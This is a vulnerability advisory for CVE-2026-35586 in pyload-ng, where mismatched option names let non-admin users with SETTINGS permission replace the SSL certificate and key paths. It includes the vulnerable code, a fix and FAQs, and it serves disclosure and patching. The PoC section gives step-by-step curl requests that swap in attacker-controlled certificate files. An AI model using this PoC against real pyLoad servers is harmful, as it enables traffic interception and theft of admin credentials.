CVE-2026-35586: Authorization Bypass for SSL Certificate/Key Configuration Due to Option Name Mismatch in pyload-ng

Published Apr 7, 2026
·
Updated

Summary

The ADMINONLYCOREOPTIONS authorization set in setconfigvalue() uses incorrect option names sslcert and sslkey, while the actual configuration option names are sslcertfile and sslkeyfile. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the sslcertchain option was never added to the admin-only set at all.

Details

The vulnerability is in src/pyload/core/api/init.py. The ADMINONLYCOREOPTIONS set is defined at lines 237-248:

python ADMINONLYCOREOPTIONS = { ("general", "storagefolder"), ("log", "sysloghost"), ("log", "syslogport"), ("proxy", "password"), ("proxy", "username"), ("reconnect", "script"), ("webui", "host"), ("webui", "sslcert"), # BUG: should be "sslcertfile" ("webui", "sslkey"), # BUG: should be "sslkeyfile" ("webui", "usessl"), } NOTE: ("webui", "sslcertchain") is entirely missing

The actual config option names are defined in src/pyload/core/config/default.cfg:39-41:

file sslcertfile : "SSL Certificate" = ssl.crt file sslkeyfile : "SSL Key" = ssl.key file sslcertchain : "CA's intermediate certificate bundle (optional)" =

The authorization check at line 267 compares the incoming (category, option) tuple against this set:

python if (category, option) in ADMINONLYCOREOPTIONS and not isadmin: self.pyload.log.error(...) return

When a request arrives with option=sslcertfile, the check evaluates ("webui", "sslcertfile") in ADMINONLYCOREOPTIONS which is False because the set contains ("webui", "sslcert"), not ("webui", "sslcertfile"). The admin-only guard is bypassed and config.set() at line 271 proceeds to write the attacker-supplied value.

The value is cast as a file type in parser.py:300-305, which resolves it via os.path.realpath() but performs no further validation:

python elif typ in ("file", "folder"): return ( "" if value in (None, "") else os.path.realpath(os.path.expanduser(os.fsdecode(value))) )

On server restart with SSL enabled, the webserver loads the attacker-controlled paths (webserverthread.py:22-23,51-52):

python self.certfile = self.pyload.config.get("webui", "sslcertfile") self.keyfile = self.pyload.config.get("webui", "sslkeyfile") ... self.server.ssladapter = BuiltinSSLAdapter( self.certfile, self.keyfile, self.certchain )

PoC

Prerequisites: A pyLoad instance with SSL enabled and a non-admin user account that has SETTINGS permission.

Step 1: Authenticate as the non-admin user to get a session cookie: bash curl -c cookies.txt -X POST 'http://localhost:8000/login' \ -d 'username=settingsuser&password=password123'

Step 2: Set the SSL certificate to an attacker-controlled file path: bash curl -b cookies.txt -X POST 'http://localhost:8000/json/saveconfig' \ -H 'Content-Type: application/json' \ -d '{"category": "core", "config": {"webui|sslcertfile": "/tmp/attacker.crt"}}' Expected response: true (config saved successfully)

Step 3: Set the SSL key to an attacker-controlled file path: bash curl -b cookies.txt -X POST 'http://localhost:8000/json/saveconfig' \ -H 'Content-Type: application/json' \ -d '{"category": "core", "config": {"webui|sslkeyfile": "/tmp/attacker.key"}}' Expected response: true (config saved successfully)

Step 4: Set the SSL certificate chain (never protected): bash curl -b cookies.txt -X POST 'http://localhost:8000/json/saveconfig' \ -H 'Content-Type: application/json' \ -d '{"category": "core", "config": {"webui|sslcertchain": "/tmp/attacker-chain.crt"}}' Expected response: true (config saved successfully)

Step 5: After the server restarts, it will load the attacker's certificate and key for all HTTPS connections.

Impact

A non-admin user with SETTINGS permission can replace the SSL certificate and key used by the pyLoad HTTPS server. When the server restarts (or is restarted by an admin), it will serve HTTPS using the attacker's certificate/key pair. This enables:

- Man-in-the-Middle attacks: The attacker, possessing the private key for the now-active certificate, can intercept and decrypt all HTTPS traffic to the pyLoad instance, including admin credentials and session tokens. - Credential theft: All users (including admins) connecting over HTTPS will have their credentials exposed to the attacker. - Configuration tampering: With intercepted admin credentials, the attacker can escalate to full admin access.

The attack requires SSL to already be enabled by an admin (the usessl option is correctly protected), the attacker to place certificate/key files on the filesystem (potentially achievable via pyLoad's download functionality), and a server restart.

Recommended Fix

Fix the option names in ADMINONLYCOREOPTIONS and add the missing sslcertchain option in src/pyload/core/api/init.py:

python ADMINONLYCOREOPTIONS = { ("general", "storagefolder"), ("log", "sysloghost"), ("log", "syslogport"), ("proxy", "password"), ("proxy", "username"), ("reconnect", "script"), ("webui", "host"), ("webui", "sslcertfile"), # Fixed: was "sslcert" ("webui", "sslkeyfile"), # Fixed: was "sslkey" ("webui", "sslcertchain"), # Added: was missing entirely ("webui", "usessl"), }

Other sources

pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the ADMINONLYCOREOPTIONS authorization set in setconfigvalue() uses incorrect option names sslcert and sslkey, while the actual configuration option names are sslcertfile and sslkeyfile. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the sslcertchain option was never added to the admin-only set at all. This vulnerability is fixed in 0.5.0b3.dev97.

— MITRE

Affected Software

2 affected componentsFixes available
pip/pyload-ng<0.5.0b3.dev97
0.5.0b3.dev97
Pyload-ng Project Pyload-ng Python<=0.5.0b3.dev96

Event History

Apr 7, 2026
CVE Published
via MITRE·04:09 PM
Data Sourced
via MITRE·04:09 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·05:16 PM
DescriptionSeverityWeaknessAffected Software
Apr 8, 2026
Advisory Published
via GitHub·12:04 AM
Data Sourced
via GitHub·12:04 AM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2026-35586?

CVE-2026-35586 has a medium severity rating due to its potential for unauthorized access to sensitive SSL configurations.

2

How do I fix CVE-2026-35586?

To fix CVE-2026-35586, upgrade to the latest version of pyload-ng above 0.5.0b3.dev97, which resolves the authorization bypass issue.

3

Who is affected by CVE-2026-35586?

CVE-2026-35586 affects users of pyload-ng versions up to and including 0.5.0b3.dev96.

4

What causes CVE-2026-35586?

CVE-2026-35586 is caused by a mismatch in the option names used for SSL certificate configuration, leading to unauthorized access.

5

Is there any workaround for CVE-2026-35586?

There are no known workarounds for CVE-2026-35586; upgrading is the recommended solution.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203